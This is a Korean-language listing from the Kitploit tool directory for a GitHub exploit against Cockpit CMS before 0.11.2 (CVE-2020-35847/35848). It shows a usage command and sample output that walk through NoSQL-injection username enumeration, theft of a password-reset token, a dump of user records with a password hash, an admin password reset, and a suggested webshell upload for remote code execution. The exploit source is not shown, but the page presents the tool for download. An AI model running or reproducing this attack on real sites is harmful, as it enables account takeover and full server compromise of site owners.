Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-35847_CVE-2020-35848 — CVE-2020-35847, CVE-2020-35848 : 계정 탈취 | Kitploit
도구/GitHubGitHub/w33vils/cve-2020-35847_cve-2020-35848
ReconnaissancePassword AttacksVulnerability AnalysisExploitationWeb Application ExploitationInformation Gathering
GitHubw33vils/cve-2020-35847_cve-2020-35848

CVE-2020-35847_CVE-2020-35848

CVE-2020-35847, CVE-2020-35848 : 계정 탈취

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
2103년 전아직 검토되지 않음

Cockpit CMS NoSQL 인젝션 (CVE-2020-35847, CVE-2020-35848)

0.11.2 버전 이전의 Cockpit CMS는 /auth/resetpassword 및 /auth/newpassword에서 NoSQL 인젝션 취약점에 취약하며, 이를 통해 비밀번호 재설정 토큰을 추출하여 사용자 세부 정보 열거 및 비밀번호 재설정이 가능합니다.

더 읽어보기 - https://swarm.ptsecurity.com/rce-cockpit-cms/

이 Python 스크립트는 시스템의 사용자를 열거하고 비밀번호를 재설정합니다.

사용법

python3 exploit.py -u http://cockpit-site-url

이 스크립트는 먼저 시스템의 사용자를 열거합니다.

[+] http://cockpit-site-url: is reachable
[-] Attempting Username Enumeration (CVE-2020-35846) : 

[+] Users Found : ['admin', 'user1', 'user2', 'user3']

그런 다음 추가 정보를 수집할 사용자를 선택할 수 있습니다. 또한 해당 사용자에 대한 재설정 토큰을 생성하며, 이는 비밀번호 재설정의 핵심 요구 사항입니다.

[-] Get user details For : admin
[+] Finding Password reset tokens
         Tokens Found : ['rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e']
[+] Obtaining user information 
-----------------Details--------------------
         [*] user : admin
         [*] name : Admin
         [*] email : [email protected]
         [*] active : True
         [*] group : admin
         [*] password : $2y$10$6uQ2PXh4vShH.D4gw..WtO0NHQq7J36ugmwKNtJGzu9p9OqSEpVUW
         [*] i18n : en
         [*] _created : 1621655201
         [*] _modified : 1621655201
         [*] _id : 60a87ea165343539ee000300
         [*] _reset_token : rp-4e82b990aff752bfb1dc9845d5338f6e610d0608bb75e
         [*] md5email : a11eea8bf873a483db461bb169beccec
--------------------------------------------

마지막으로 사용자의 비밀번호를 재설정하도록 선택할 수 있습니다.

[+] Do you want to reset the passowrd for admin? (Y/n): y
[-] Attempting to reset admin's password:
[+] Password Updated Succesfully!
[+] The New credentials for admin is: 
         Username : admin 
         Password : new_random_password

그런 다음 /finder 구성 요소에 웹셸을 업로드하여 RCE를 획득하도록 선택할 수 있습니다.

도구 다운로드